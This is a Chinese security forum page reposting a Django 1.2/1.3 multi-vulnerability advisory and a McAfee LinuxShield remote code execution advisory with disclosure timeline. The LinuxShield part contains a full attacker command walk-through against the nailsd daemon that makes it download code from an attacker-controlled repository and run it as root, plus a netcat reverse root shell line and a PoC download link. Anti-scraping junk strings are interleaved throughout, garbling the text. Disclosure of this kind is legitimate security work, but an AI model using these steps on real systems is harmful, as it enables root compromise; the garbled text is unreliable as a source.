最近看过此主题的会员

返回列表 发帖
Django开发框架多个安全漏洞
发布时间: 2011-09-12

4 ]' f- ^+ L/ H. b, s
影响版本:  N% t9 v! k4 b
Django 1.2.5
" @) s  ?6 y3 f3 yDjango 1.3 beta 15 A9 e* ^9 k+ N" ~& [( G
Django 1.2.4
% Y0 y) `1 W; r2 V% {' \  ADjango 1.2.2
. y/ ?% j$ U! S1 VDjango 1.2

9 n& h( n7 W- M% z2 [$ i* W
漏洞描述:
5 t4 k: x8 H$ n8 C- v
Django是一款开放源代码的Web应用框架,由Python写成。0 u- `  q9 u- R9 R  z
Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
2 h7 W  e8 e* F' }2 `1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。2 B- E) S2 \% i6 Q2 V. I1 S7 \2 M
2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。+ D  o6 f9 C1 r+ X; D0 P  T8 A
3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
0 A/ T% s: }/ \4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
$ t/ o! t! e% K% E% w9 \
细节参考:
0 H# k9 G* o* _9 Q' z/ s9 q$ O" Fhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
  l9 v0 l' w; M; W$ T+ r0 qhttp://secunia.com/advisories/45939/
$ J' N! ?" I9 \* `: b' Z

# `6 H6 Y  i4 Y; C
# C% q1 G! [( P8 j; n6 |3 }$ Y( E7 n, @: |- u% i

9 a" {/ T. O0 w. x* |! \; y; w! B1 \- ~

" c; ^! }% N9 {0 w) t) W, z$ d
3 ~& v) O! {" R; A1 {
) ^& d9 g' T8 k0 w$ z/ k& `' X6 H) e# v+ o

4 d. G* |1 e2 B8 \
" {, s3 o: E5 B  x" t% y7 }1 S
4 h$ F3 c! Y, {; }2 t2 j3 Z9 C% }) z$ g* D7 y' Z) }. |1 u: M
3 C# i! r& G: ~- n3 H; v

+ W( C* G; W. Q  ^2 F5 L, }
7 N) J( e: \! l% O' P) B7 g+ t- d/ X  c! R
9 Q- P  o+ O( }7 Z+ V3 K

9 \& x% D* f" f1 o- p- a0 X公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

McAfee LinuxShield 本地/远程代码执行漏洞
McAfee LinuxShield remote/local code
, Q2 g9 ~' K1 u/ t. L) C5 m影响版本: McAfee LinuxShield <= 1.5.1
, _  v3 E3 ]9 P远程攻击: Yes ( B; L7 Y4 Y% A! P# L% y+ ]1 T- a
本地溢出: Yes
7 @; z/ M- Y7 T! p1 ~背景阅读:) o) ?. k% Y1 B+ j0 d
===========
  c4 Z# U, H1 W
  O6 J# [% I" R7 d- ]2 h# o) _, RLinuxShield detects and removes viruses and other potentially unwanted
0 O5 W  B( b$ U/ L; D/ dsoftware on Linux-based systems. LinuxShield uses the powerful McAfee
5 K: W8 k# Y7 c+ G, f8 Ascanning engine ?&amp;#65533;&amp;#65533; the engine common to all our
2 V" d9 A( ~' @( @2 @- F9 Hanti-virus products.
. o! O  _1 e) m& l& t0 O0 T, C+ F' {% X8 E
Although a few years ago, the Linux operating system was considered a
  Z- `2 l# N0 Lsecure environment, it is now seeing more occurrences of software
( i& S- {: e6 `+ W, L! Q6 l. Especifically written to attack or exploit security weaknesses in; l7 ^6 l+ [, P# P5 q1 [
Linux-based systems. Increasingly, Linux-based systems interact with0 F& P5 \6 @' D. G& O9 J7 b. k$ f
Windows-based computers. Although viruses written to attack Windows-
2 y0 \; x( \6 H, g8 q* r3 g+ qbased systems do not directly attack Linux systems, a Linux server
- O* B( s& q! r, f' Y+ E8 Kcan harbor these viruses, ready to infect any client that connects to& e; o% q; d4 Z! c" C" L) @, y
it.
  K5 g; f' \8 E0 v8 b4 S; g; z6 _$ K, u% n! N; A
When installed on your Linux systems, LinuxShield provides protection5 j7 P4 o2 P% \" _& a
against viruses, Trojan horses, and other types of potentially7 \. `% R: [# b* N
unwanted software.% C/ ~/ m7 }3 u, h8 H  w
) X; }+ U$ a) o1 t/ f5 K6 a
LinuxShield scans files as they are opened and closed+ f+ j! _2 F' S# }
?&amp;#65533;&amp;#65533; a technique
' m* o; n7 H$ K" l9 Wknown as on-access scanning. LinuxShield also incorporates an
: I! k, @2 G6 k1 J& |7 O& W* ]' non-demand scanner that enables you to scan any directory or file in
7 J. b. g: W0 N/ g% k% uyour host at any time.
. G% n& L1 n! k; z
5 \2 O* X! s. V& N5 o( sWhen kept up-to-date with the latest virus-definition (DAT) files,$ r# E8 x/ r' ?6 {
LinuxShield is an important part of your network security. We
# O- D( B+ Z) I6 m# I! X+ zrecommend that you set up an anti-virus security policy for your
/ S( `* f' Y) mnetwork, incorporating as many protective measures as possible., D+ K+ W6 A* I& Q- |  F

2 R) ]. v$ f, ]! P6 w" `( tLinuxShield uses a web-browser interface, and a large number of
1 ~) W0 C* J  hLinuxShield installations can be centrally controlled by ePolicy8 |& {  w  Z; r. |, H- X1 c
Orchestrator.6 l; y2 ^0 P+ y9 \
% E1 Z. {; f: |8 L% B& I
(Product description from LinuxShield Product Guide)3 K+ G: u+ y$ i" ^0 B

8 H' l' x/ {# H  u( c
* N( L! n4 C/ W5 j, z$ Q. X8 t% u0 G3 b! o
Description:# P  e5 Y) D& y( S  T
============% v! ^) M" ^7 E% ^% b9 R
5 }2 j. {# L" I- C* E
This vulnerability allows remote attackers to execute arbitrary code
/ R) U* \9 j$ b" zon vulnerable installations of McAfee LinuxShield. User interaction
* z4 i' h$ Q! H5 T0 Vis not required to exploit this vulnerability but an attacker must
( {( v1 y* @0 i/ Y0 v0 Cbe authenticated.' Y) N2 w  X: ?: B

! L0 Z7 ]9 A: w, X6 qThe LinuxShield Webinterface communicates with the localy installed
6 g# {  a  b+ B"nailsd" daemon, which listens on port 65443/tcp, to do4 v( W1 F: x4 J3 t8 P
configuration
! M/ R1 |, u. ?* `, |changes, query the configuration and execute tasks.
! l2 Q3 I) n' l" c' }# C1 [
# N2 J/ O1 v1 C% A+ SEach user, which can login to the victim box, can also authenticate
) a+ ~. G+ E/ h8 V2 B9 |- lit self to the "nailsd" and can do configuration changes and
% K, P: z4 |, D4 m: {execute* P; H/ B7 c$ B6 J
tasks with root privileges.
$ _* W0 P: z# D5 N* k1 C$ S4 n6 O% e. s% U( c7 L, \
A direct execution of commands is not possible, but it is possible to4 _& ?0 R! {; z  Y- M
download and execute code through manipulation of the config and2 _" Y0 f3 Z3 g( p8 y& a: R
execute schedule tasks of the LinuxShield.
' W' A2 @1 e. z6 Y  `! f+ w
  X7 m: \1 p  s7 U0 f7 Z9 c
! ^. @. ~' b& k5 l1 f& o- d8 D# Lwalk-through (after the TLS handshake):: I! B; n5 |* v7 V9 y, a
+--------------------------------------
. `9 K" q8 K" P7 W/ X4 {, J, J9 o: k, L8 Q
nailsd > +OK welcome to the NAILS Statistics Service; l; q5 Y1 @0 y& s
attacker> auth <user> <pass>) x  r! U+ G& J. @
nailsd > +OK successful authentication# h, `' k! o# X7 c

  Q( ^( Y- r$ B. x6 ~0 i3 ?" h& n: q# Set the Attacker repository to download our code from a httpd
/ Q! `2 \5 }* J, D) f# (catalog.z), X% M4 ^# R% i' U
#---------------------------------------------------------------- G" X; O& o8 y
attacker> db set 1 _table=repository status=1 siteList=<?xml version
' `4 |( E3 c. ?/ R3 x="1.0" encoding="UTF-8"?><ns:SiteLists
2 Y' x& m" b+ O% e3 R9 H0 r0 Jxmlns:ns="naSiteLi
& f8 z& W# P; V% a+ w% ^  A0 n9 Jst" GlobalVersion="20030131003110"/ l' A: M' F1 v! F+ k  F* b  k
LocalVersion="20091209
! z5 J' D' n+ o0 A8 q! G# @( ]161903" Type="Client"><SiteList: G3 @* ]4 q' q1 ?8 a; W4 t
Default="1" Name="SomeGU
+ \9 G! S6 @5 ^9 l0 j" RID"><HttpSite Type="repository"" p3 M, K9 m4 E* X
Name="EvilRepo" Order="1) D1 d7 u' _# x$ q
" Server="<attackerhost>:80"# j, s5 \4 {. C4 x0 p2 T
Enabled="1" Local="1"><Rela
( j+ L( x: P1 ?8 d2 o6 K. D% q+ `4 K; }5 ^) L% q' @
tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use! b/ Z7 J$ O9 I- F
rName></1 U$ \# k4 R8 U0 S/ _# E
UserName><Password  `, g! u. e5 a! N
Encrypted="0"/></HttpSite></SiteList></
- {; J4 k4 s8 V) P/ s1 A0 fns:SiteLists> _cmd=update2 ?2 U6 v4 Q4 W$ A
nailsd > +OK database changes buffered.7 ^% b4 c$ n7 a, l

8 B/ s- O( X; x4 h! D# Execute task to set the attacker repository
# U! {8 E8 U9 X# T0 m$ z+ U#---------------------------------------------------------------
% J" g* o( F  c0 pattacker> task setsitelist* N2 s% [9 X7 X) p0 f" C2 p
nailsd > +OK setting sitelist from CMA.) Q  g) c, j9 q( o

( d( y  y7 E9 W0 a1 ?( O$ }  y# Execute the default Update task to download the code
) p+ }4 r; \" h/ E; P7 r#---------------------------------------------------------------
; r7 j( a, I! N; j1 Y8 w' dattacker> task nstart LinuxShield Update
* B6 k# b7 b0 j: N* F! ?5 F( Tnailsd > +OK task LinuxShield Update starting
" ^3 Q$ h9 N7 v% h. H9 B$ A7 P$ Z) t) W& E8 O3 T
# Create a Scan profile, which executes our code. The profiles are# W: e: J# {7 ^
# not stored in the database.& C7 E$ e' i0 q
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
9 o0 c' ?$ k; @) c) Q0 u#---------------------------------------------------------------
: ?5 m" k, O6 K! U6 g: K6 tattacker> sconf ODS_99 begin
# w& S. w, W$ J8 `* X0 X1 bnailsd > +OK 1260400888
- @  i4 f6 u/ u& {" z' _/ E
$ E$ p: s1 A) q( ?+ x7 S# Set the variable "nailsd.profile.ODS_99.scannerPath" to the
4 i2 ]2 T0 b! X2 ~path8 W3 L2 g; F' e. _. f# a4 _
# where our earlier downloaded catalog.z file is stored.% ]/ c2 ^$ {: V2 u  d* k
# (/opt/McAfee/cma/scratch/update/catalog.z)
8 Z' M- s. r8 T1 H5 o#---------------------------------------------------------------  F* ?' |! e8 y( g5 g
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=3 T9 `; |  C" C% n2 O
true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
8 Z; m9 F9 C4 j" Z. ~DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
5 V* I2 r. y4 H  h2 z10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng2 j$ N% C$ V& L9 W) _) e! S
ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro( E- h' @% K' Y1 `$ J1 t
file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
, U7 H% G, h- M8 Y" w3 n) W$ W: air=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
; m$ t1 G  n' Y* r3 @  W% OginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd; B  g5 e/ u  B" O' N& `
.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
0 a. ^. b0 O' R4 g' N6 |risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
4 q6 G& u1 d* se nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
6 K  M) m3 Y  |  d, A.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi. I  G7 a2 ?, ?  S' J
le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil4 ]- I& M% j' Y, D+ z  u
dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
* x8 {; f: u/ A  S; }e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr. C, |* w. _- y, h' J+ t+ j  B  J  g
ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm4 r3 m6 c9 b) I& v
o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
2 I0 [' ^, h# H- \( s0 d/ A4 E.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
, L8 W% g1 _  E) r8 i; |# ]' T1 Nrue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat* \: u$ I5 f' f: m. x% P4 s
ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=1007 I. v. ]6 K6 A" R( b( E
00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
, O& D5 c6 ]6 a1 j5 d1 g1 F: sODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
# L" ^* k! k9 G) P8 qter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
2 X/ j; `) b" |: T& U, ynailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr! K8 D4 `8 z; S) v$ _
ofile.ODS_99.filter.extensions.type=extension nailsd.profil
. T) U* V. Q& \/ [+ we.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99& Y% ^8 z6 o3 U+ T
.action.Default.secondary=Quarantine nailsd.profile.ODS_99.1 I* ^- D1 l; `; K* o% J7 x
action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
$ D+ c! e8 u- z  |* ~% T* E' m  mecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa' u. T  @$ y* m. D+ [
ss nailsd.profile.ODS_99.action.error=Block9 u: H+ J- |' @4 f  d
nailsd > +OK configuration changes buffered
* y" Q* ?7 T( V0 c9 nattacker> sconf ODS_99 commit 12604008883 J2 h$ R8 u  W+ D; g/ l  h' U2 F
nailsd > +OK configuration changes stored6 ~# |: }- o  s5 f% ^9 K

' N, H9 M; F& {1 Z# }6 i: J3 @% g6 `# Set a scan task with the manipulated profile to execute the code
8 t+ l7 ~/ s: d. X* x4 E+ h  p#---------------------------------------------------------------/ q# b! N% d# z+ _, e8 k
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy9 L/ a/ z. W$ \- K' {- P  s% w
pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
* T- \7 Q1 \! h5 f( ]& A8 ]mp;exclude:false timetable=type=unscheduled taskResults=0 i( U3 V2 e( g* o) Y
_lastRun=1260318482 status=Stopped _cmd=insert8 M" u! S# z' g. x7 w/ p
nailsd > +OK database changes buffered, _& ^8 ]5 O- |5 N# l
. r% a- L5 a0 F/ U1 g# N2 f' x; x
# Execute scan task to execute the code5 ^7 B6 P  \. N9 H( p/ k
#---------------------------------------------------------------' v0 g: i0 u7 b* h8 l
attacker> task nstart Evil Task3 l. J7 d& j3 ?3 q

' E. G( C1 E- h, z4 A+-------------------------------------- walk-through EOF
" Y) E9 j' B% J2 J( @8 V' M8 t6 g/ l9 p
7 l/ @7 @/ L: H
To get a reverse root shell place something like this in the catalog.z  f2 b3 b6 r; u2 ^: `( o
7 w$ p; ]3 @4 x% k$ w: v1 L
--- snip ---# o! w  x! f5 F4 Q( E
#!/bin/sh: U* t, V( O: U4 j
nc -nv <attacker_host> 4444 -e /bin/sh
& y/ @5 D9 j8 v" p9 \) }--- /snip ---
# @9 b/ S) c( K" T  @: U2 b% _2 W4 M: K

; ^2 H0 |. z& h4 ], C
1 N3 c/ M" B% T1 z( `( p$ T* pProof of Concept :5 @. X" Z9 A' K$ [8 D" V- R. Y
==================
- ?3 A0 c" S" d( @' s# c1 N
1 m! j& }# A2 F# {4 R2 @' I% chttp://inj3ct0r.com/sploits/11165.tar.gz
. Z, ~: `/ R/ Z4 L- K+ z# a* l
9 v3 x: s6 c5 C
, Z( n& k- N% q. _- V2 J) k5 b
. A& e% ^7 e+ z1 V% K4 t/ x; i. q  KSolution:
4 w# j9 u" a, U/ g5 {=========
8 a) f" R% c# V( Z$ o  H7 Q& b8 [& D9 s6 v& f9 v8 z
McAfee Advisory( J( l. h  [1 X" b! D# k
+--------------$ j- h& @/ n8 m/ k* A
https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
4 \3 n" C' n+ H- G5 Z
$ k7 L4 M0 x; V- [" P: ?. A# n1 b! j. @* n& v3 h

, R  f- @; h; @# y) GDisclosure Timeline (YYYY/MM/DD):. M' m3 f  q% n; s1 Z" n" `
=================================( G, j$ p% [5 j+ x  b3 j9 X2 Y3 `

: m7 a! F5 g# r2009.12.07: Vulnerability found
# c  ~* t. o5 u4 J8 z, W" S- O2010.02.03: Asked vendor for a PGP key
9 A6 W. V% _+ ?7 f& d/ Z2 e2010.02.05: Vendor sent his PGP key
" a- m# u4 _& B0 K# l2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure- c% v; P% e0 B9 G/ U
date (2010.02.18) to Vendor$ }! ^1 s' ]5 h2 u. I0 h
2010.02.05: Vendor acknowledges the reception of the advisory2 e, q/ x: G( H) }/ l' Q3 g+ x
2010.02.16: Ask for a status update, because the planned release date is9 V8 x! X) S; ^
2010.02.18.
8 z; _  H% W& ^2010.02.16: Vendor response that, they are currently working on a patch2 \* R  R: N+ k% l* M0 s
2010.02.17: Changed release date to 2010.02.25.$ D/ t& c9 h6 Q2 V0 R  A( g4 I- C
2010.02.22: Vendor gives a status update, that they are able to release2 a( k+ n. z' _- g' W2 p
the patch on 2010.02.25.% U. |/ C5 l8 A" l$ f
2010.02.24: Ask for a list of affected products and the advisory url.
! f0 q  x0 ~! @* p: Q2010.02.24: Vendor sends the list.1 n1 n$ e$ b; H" M$ f/ S
2010.03.02: Release of this Advisory
9 r6 m+ h' b5 m  `" Y  j: N+ r0 J4 t& r9 k0 B, g
. }; O. F2 }3 F) c. y! ?7 G

' W3 E/ M; m/ H% j1 t, D7 i5 F0 U5 W! k" {# s. s: s& w! [

* g0 b9 ]& z4 l7 u) w& d
6 y2 e$ i* e( r1 s8 \
0 v" t5 X3 ]. k- O' X
4 l$ F. R3 }; b" q, }  N" p" a% u8 ~! e) f, \
! |' S2 S0 C4 v( b# j; [
7 [% z+ F' ^. L- l6 `+ ]: R

2 l+ s( j+ b/ u( u1 X# ^8 M2 |( {+ U; n* F! g
7 ~" U& X$ K% p4 R. t! @$ Z& j

8 ~* ~5 M# n$ c+ v5 t3 Z
! \3 b9 }: j5 L1 Z$ t+ \# s* n7 c8 y/ c& ~1 E

9 d. n" E) ?+ _# N6 g
# d" D( w. k$ n! h" \
1 D$ P. V& Z! X* e2 r6 N5 z/ w% O" z
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表